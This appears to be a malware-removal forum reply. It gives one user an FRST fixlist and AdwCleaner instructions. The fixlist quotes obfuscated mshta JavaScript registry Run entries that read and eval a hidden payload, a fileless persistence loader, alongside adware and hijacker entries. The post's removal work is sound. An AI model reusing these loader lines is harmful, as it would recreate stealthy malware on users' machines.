Hi this looks like something new, so when you have completed the fix could I have a fresh FRST scan please
CAUTION : This fix is only valid for this specific machine, using it on another may break your computer
Open notepad and copy/paste the text in the quotebox below into it:
CreateRestorePoint:
HKLM-x32\...\Run: [gmsd_gb_005010023] => [X]
HKLM-x32\...\Run: [**b5ece8a9<*>] => mshta javascript:Mml0EpM="a";w9N=new%20ActiveXObject("WScript.Shell");azsWhPH9c="GA";D2TB8V=w9N.RegRead("HKLM\\software\\Wow6432Node\\817f9077\\9364e27d");FVT2p8EbN="6SEkU";eval(D2TB8V);eVBVxi05w="189 (the data entry has 6 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM-x32\...\Run: [gmsd_gb_002030026] => [X]
HKU\S-1-5-18\...\Run: [**b5ece8a9<*>] => mshta javascript:UOTG80XHy="A";o8j=new%20ActiveXObject("WScript.Shell");BR3ISZB4="Wx2yMPvE";rbJM9=o8j.RegRead("HKCU\\software\\817f9077\\9364e27d");lv6ddkj="8IUKMkeA";eval(rbJM9);uEFdzI8="inNiyXLQr"; <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2193330594-1523224260-2583000878-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.trovi.com/?gd=&ctid=CT3334822&octid=EB_ORIGINAL_CTID&ISID=MAA83CF91-C36D-4AA5-9567-563EDBB3A255&SearchSource=55&CUI=&UM=8&UP=SP0B9A39A2-9137-4C56-B640-E8F9B396CBB9&D=071015&SSPV=
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.cassiopessa.com/results.php?f=4&q={searchTerms}&a=csp_otbrw7_15_28&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0AtB0C0AyDzy0DzytBtBtN0D0Tzu0StCtBzzyCtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2SyBtDyDtDzzyCzztBtGyEtB0FzytGtA0CzyyDtGyEtB0BzztGzyyEyDyByD0C0DzzyEyD0ByB2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0F0DtD0CzztBtCtGyEtAtD0BtGyEzz0ByEtG0B0FtA0AtGyDyCyEyEyB0EtCyE0DyD0B0A2QtN0A0LzuyE&cr=1054702287&ir=
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.cassiopessa.com/results.php?f=4&q={searchTerms}&a=csp_otbrw7_15_28&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0AtB0C0AyDzy0DzytBtBtN0D0Tzu0StCtBzzyCtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2SyBtDyDtDzzyCzztBtGyEtB0FzytGtA0CzyyDtGyEtB0BzztGzyyEyDyByD0C0DzzyEyD0ByB2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0F0DtD0CzztBtCtGyEtAtD0BtGyEzz0ByEtG0B0FtA0AtGyDyCyEyEyB0EtCyE0DyD0B0A2QtN0A0LzuyE&cr=1054702287&ir=
SearchScopes: HKU\S-1-5-21-2193330594-1523224260-2583000878-1000 -> {015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = http://www.trovi.com/Results.aspx?gd=&ctid=CT3334822&octid=EB_ORIGINAL_CTID&ISID=MAA83CF91-C36D-4AA5-9567-563EDBB3A255&SearchSource=58&CUI=&UM=8&UP=SP0B9A39A2-9137-4C56-B640-E8F9B396CBB9&D=071015&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-2193330594-1523224260-2583000878-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.cassiopessa.com/results.php?f=4&q={searchTerms}&a=csp_otbrw7_15_28&cd=2XzuyEtN2Y1L1QzutDtDtBtBtCyD0AtB0C0AyDzy0DzytBtBtN0D0Tzu0StCtBzzyCtN1L2XzutAtFtCtCtFtAtFtCtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2SyBtDyDtDzzyCzztBtGyEtB0FzytGtA0CzyyDtGyEtB0BzztGzyyEyDyByD0C0DzzyEyD0ByB2QtN1M1F1B2Z1V1N2Y1L1Qzu2Szy0F0DtD0CzztBtCtGyEtAtD0BtGyEzz0ByEtG0B0FtA0AtGyDyCyEyEyB0EtCyE0DyD0B0A2QtN0A0LzuyE&cr=1054702287&ir=
Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 - No File
S4 zejytose; C:\Users\magicbrew\AppData\Roaming\1E00D720-1436286050-7701-9826-002215A2CA58\jnsh73EE.tmp [199168 2015-07-10] () [File not signed]
S4 nosepoze; C:\Users\magicbrew\AppData\Roaming\1E00D720-1436286050-7701-9826-002215A2CA58\knsc563B.tmpfs [X]
R1 {699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64; C:\Windows\System32\drivers\{699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64.sys [48784 2015-07-12] (StdLib)
S1 innfd_1_10_0_14; system32\drivers\innfd_1_10_0_14.sys [X]
2015-07-13 13:35 - 2015-07-13 13:35 - 00002476 _____ C:\Users\magicbrew\Desktop\Reimage2.lnk
2015-07-13 13:10 - 2015-07-12 22:00 - 00048784 _____ (StdLib) C:\Windows\system32\Drivers\{699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64.sys
2015-07-13 09:41 - 2015-07-13 09:52 - 00089365 _____ C:\ProgramData\L3553OBf.dat
2015-07-10 16:42 - 2015-07-13 13:02 - 00000000 ____D C:\Program Files (x86)\gmsd_gb_002030026
2015-07-10 16:42 - 2015-07-10 16:42 - 00003118 _____ C:\Windows\System32\Tasks\{6DCBDF0D-5DAA-460D-A57A-FC54E72EB4A8}
2015-07-10 10:26 - 2015-07-13 09:41 - 00000000 ____D C:\ProgramData\abc
2015-07-07 17:35 - 2015-07-13 12:35 - 00000000 ____D C:\Program Files (x86)\CinemaPlus-3.2cV07.07
2015-07-07 17:35 - 2015-07-13 09:44 - 00000004 _____ C:\Windows\SysWOW64\029B560A371F4E00AB32838EBC01B9E7
2015-07-07 17:35 - 2015-07-07 17:35 - 00000000 ____D C:\Users\magicbrew\AppData\Local\globalUpdate
2015-07-07 17:35 - 2015-07-07 17:35 - 00000000 ____D C:\Program Files (x86)\globalUpdate
2015-07-07 17:35 - 2015-07-07 17:35 - 00000000 ____D C:\Program Files (x86)\c715af32-1dba-4665-97b0-d821aa5cac1c
2015-07-07 17:34 - 2015-07-13 12:34 - 00000000 ____D C:\Program Files (x86)\Coupoon
2015-07-07 17:34 - 2015-07-07 17:34 - 00000000 ____D C:\Users\magicbrew\AppData\Local\Crossbrowse
2015-07-07 17:33 - 2015-07-13 12:34 - 00000000 ____D C:\Users\magicbrew\AppData\Local\SmartWeb
2015-07-07 17:29 - 2015-07-07 17:29 - 00000000 ____D C:\Users\magicbrew\Documents\Any Video Converter
2015-07-07 17:28 - 2015-07-13 13:14 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\Anvsoft
2015-07-07 17:28 - 2015-07-13 13:14 - 00000000 ____D C:\Program Files (x86)\Anvsoft
2015-07-07 17:28 - 2015-07-07 17:28 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\OpenCandy
2015-07-07 17:20 - 2015-07-13 12:34 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\1E00D720-1436286050-7701-9826-002215A2CA58
2015-07-07 16:42 - 2015-07-07 16:42 - 00000000 ____D C:\Users\magicbrew\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
2015-07-07 17:48 - 2015-05-11 16:57 - 00000000 __SHD C:\Users\magicbrew\AppData\Local\EmieUserList
2015-07-07 17:48 - 2015-05-11 16:57 - 00000000 __SHD C:\Users\magicbrew\AppData\Local\EmieSiteList
2015-07-07 17:48 - 2015-05-11 16:57 - 00000000 __SHD C:\Users\magicbrew\AppData\Local\EmieBrowserModeList
2014-12-02 12:21 - 2014-12-02 12:21 - 0000037 ___SH () C:\Users\magicbrew\AppData\Roaming\3491672254e498b9d1dc6f1.41918858
2015-07-13 09:41 - 2015-07-13 09:52 - 0089365 _____ () C:\ProgramData\L3553OBf.dat
Task: {15011F61-317C-4C6E-B9CC-BE3D69FC7EF6} - \0be795aa-89f8-4c7a-9398-1041b523595d-7 No Task File <==== ATTENTION
Task: {1BD5DD3B-034C-404D-A865-43F5A9A3D8A4} - System32\Tasks\{6DCBDF0D-5DAA-460D-A57A-FC54E72EB4A8} => pcalua.exe -a C:\PROGRA~2\SearchProtect\Main\bin\uninstall.exe -c /S <==== ATTENTION
Task: {1C675159-F615-4178-BDA2-661B02F80695} - \0be795aa-89f8-4c7a-9398-1041b523595d-10_user No Task File <==== ATTENTION
Task: {3698927B-EA05-4575-B552-EB753A7B98DF} - \0be795aa-89f8-4c7a-9398-1041b523595d-1-6 No Task File <==== ATTENTION
Task: {3D338D15-AA7D-44DD-9AA0-372968117ACD} - \0be795aa-89f8-4c7a-9398-1041b523595d-1-7 No Task File <==== ATTENTION
Task: {3DB89CD6-34E7-41C7-8229-546728E14DB5} - \CreateChoiceProcessTask No Task File <==== ATTENTION
Task: {42D26C8B-DD80-462E-98D8-DA6D742BC71E} - \0be795aa-89f8-4c7a-9398-1041b523595d-3 No Task File <==== ATTENTION
Task: {9F0B38CD-7EBC-4491-9456-2FC16171043E} - \0be795aa-89f8-4c7a-9398-1041b523595d-5 No Task File <==== ATTENTION
Task: {A02824C8-9D89-4F64-92EF-547A9C0616DC} - System32\Tasks\ProPCCleaner_Popup => C:\Program Files (x86)\Pro PC Cleaner\Splash.exe <==== ATTENTION
Task: {A6AF9D85-7F9A-476D-95F0-49FC3D51711D} - \0be795aa-89f8-4c7a-9398-1041b523595d-5_user No Task File <==== ATTENTION
Task: {E6C0A9FE-C0BF-4860-A45E-1701C67BC76B} - \PC SpeedUp Service Deactivator No Task File <==== ATTENTION
Task: {F0E841B2-7008-49CC-B4ED-BE8F5F76A920} - System32\Tasks\ProPCCleaner_Start => C:\Program Files (x86)\Pro PC Cleaner\ProPCCleaner.exe <==== ATTENTION
Task: {F1D93A0E-ED45-4FF7-8D26-42E20408A045} - \0be795aa-89f8-4c7a-9398-1041b523595d-6 No Task File <==== ATTENTION
Task: {FAC3FEDE-18BE-498C-B23D-0E6CD1ADF476} - \SmartWeb Upgrade Trigger Task No Task File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Microsoft:QcOdGCxHYBG4TkN7XblHwOl03ccj
AlternateDataStreams: C:\ProgramData\Microsoft:tXBgMqmC0uFWziwQrJ5GM6A7Ouis
AlternateDataStreams: C:\ProgramData\PACE:769ABF6D611ED68D
AlternateDataStreams: C:\Users\magicbrew\Cookies:gv1yIDMJyN4dl5RY
AlternateDataStreams: C:\Users\magicbrew\Cookies:L0LGLDSGlbNUjxSPWvA8KYn9jt
AlternateDataStreams: C:\Users\magicbrew\Local Settings:89R4kgQyaYq1FGiXD11mik09mhPH
AlternateDataStreams: C:\Users\magicbrew\Local Settings:koYwWWdpxBgTg4rs8KPLh
AlternateDataStreams: C:\Users\magicbrew\AppData\Local:89R4kgQyaYq1FGiXD11mik09mhPH
AlternateDataStreams: C:\Users\magicbrew\AppData\Local:koYwWWdpxBgTg4rs8KPLh
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Application Data:89R4kgQyaYq1FGiXD11mik09mhPH
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Application Data:koYwWWdpxBgTg4rs8KPLh
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\hPkIakbtz61q:Zk0qrQeyENrPfsOIfIT1vtF
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Temp:W7sJktx3CgzjNuxON43o9
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Temporary Internet Files:gI0Cm4QLLW8Ky07opwOnfQ
AlternateDataStreams: C:\Users\magicbrew\AppData\Local\Temporary Internet Files:z6zlAqiYS6ilphADGZa
C:\Windows\System32\drivers\{699bd245-8d10-4e76-8ffa-df6cfdf0e2bc}Gw64.sys
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers
Save this as fixlist.txt, in the same location as FRST.exe
https://dl.dropboxusercontent.com/u/73555776/FRSTfix.JPG
Run FRST and press Fix
On completion a log will be generated please post that
THEN
Please download AdwCleaner by Xplode onto your desktop.
[*]Close all open programs and internet browsers.
[*]Double click on AdwCleaner.exe to run the tool.
[*]Click on Scan.
[*]After the scan is complete click on “Clean”
[*]Confirm each time with Ok.
[*]Your computer will be rebooted automatically. A text file will open after the restart.
[*]Please post the content of that logfile with your next answer.
[*]You can find the logfile at C:\AdwCleaner[S0].txt as well.
